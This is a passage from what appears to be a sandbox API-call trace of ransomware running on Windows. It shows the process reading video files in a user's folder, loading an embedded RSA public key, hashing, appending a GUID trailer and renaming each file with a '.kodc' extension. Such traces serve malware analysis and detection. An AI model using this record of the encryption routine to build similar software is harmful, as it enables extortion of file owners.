(HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7bd8 [0100.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ba8 [0100.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7bf0 [0100.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a28 [0100.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0100.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0100.116] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0100.116] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7bc0 | out: hHeap=0x630000) returned 1 [0100.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7bc0 [0100.116] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x14949, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.116] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.116] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.116] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.117] CloseHandle (hObject=0x5cc) returned 1 [0100.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0100.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0100.118] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gyahlrB1X9.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\gyahlrb1x9.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gyahlrB1X9.avi.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\gyahlrb1x9.avi.kodc")) returned 1 [0100.120] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x227ef2d0, ftCreationTime.dwHighDateTime=0x1d5c0e0, ftLastAccessTime.dwLowDateTime=0xbb9fc940, ftLastAccessTime.dwHighDateTime=0x1d5c224, ftLastWriteTime.dwLowDateTime=0xbb9fc940, ftLastWriteTime.dwHighDateTime=0x1d5c224, nFileSizeHigh=0x0, nFileSizeLow=0x143ad, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gZKZP.avi", cAlternateFileName="")) returned 1 [0100.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0100.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0100.120] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gZKZP.avi") returned=".avi" [0100.120] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gZKZP.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\gzkzp.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.120] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=82861) returned 1 [0100.120] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.123] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x14387, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.123] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.124] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x143ad, lpOverlapped=0x0) returned 1 [0100.125] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.125] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.125] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.125] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0100.126] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.126] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.126] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.126] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.126] GetLastError () returned 0x0 [0100.126] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.126] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0100.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.126] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.126] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.126] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x143b0) returned 0x9bb8968 [0100.127] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c388 [0100.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b90 [0100.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c3d0 [0100.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ba8 [0100.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7bd8 [0100.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7bf0 [0100.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.127] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0100.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7bd8 | out: hHeap=0x630000) returned 1 [0100.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7bf0 | out: hHeap=0x630000) returned 1 [0100.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0100.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7bf0 [0100.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0100.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7bd8 [0100.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0100.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0100.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0100.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0100.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0100.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7bf0 | out: hHeap=0x630000) returned 1 [0100.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7bd8 | out: hHeap=0x630000) returned 1 [0100.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0100.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.128] GetCurrentThreadId () returned 0x42c [0100.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba6668 [0100.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0100.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0100.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.129] GetCurrentThreadId () returned 0x42c [0100.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0100.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0100.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0100.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7bd8 [0100.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0100.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7bf0 [0100.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7bc0 [0100.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7c08 [0100.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb79c8 [0100.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0100.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0100.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0100.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7bd8 | out: hHeap=0x630000) returned 1 [0100.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7bd8 [0100.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.131] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x143ad, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.131] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0100.131] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.131] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.132] CloseHandle (hObject=0x5cc) returned 1 [0100.133] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gZKZP.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\gzkzp.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gZKZP.avi.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\gzkzp.avi.kodc")) returned 1 [0100.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0100.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.134] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0100.135] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce196410, ftCreationTime.dwHighDateTime=0x1d5b67f, ftLastAccessTime.dwLowDateTime=0xfffdbf80, ftLastAccessTime.dwHighDateTime=0x1d5c1ec, ftLastWriteTime.dwLowDateTime=0xfffdbf80, ftLastWriteTime.dwHighDateTime=0x1d5c1ec, nFileSizeHigh=0x0, nFileSizeLow=0x10e03, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="j20KuR.mkv", cAlternateFileName="")) returned 1 [0100.135] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j20KuR.mkv") returned=".mkv" [0100.135] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j20KuR.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\j20kur.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.135] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=69123) returned 1 [0100.135] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.138] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x10ddd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.138] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.139] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.139] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, 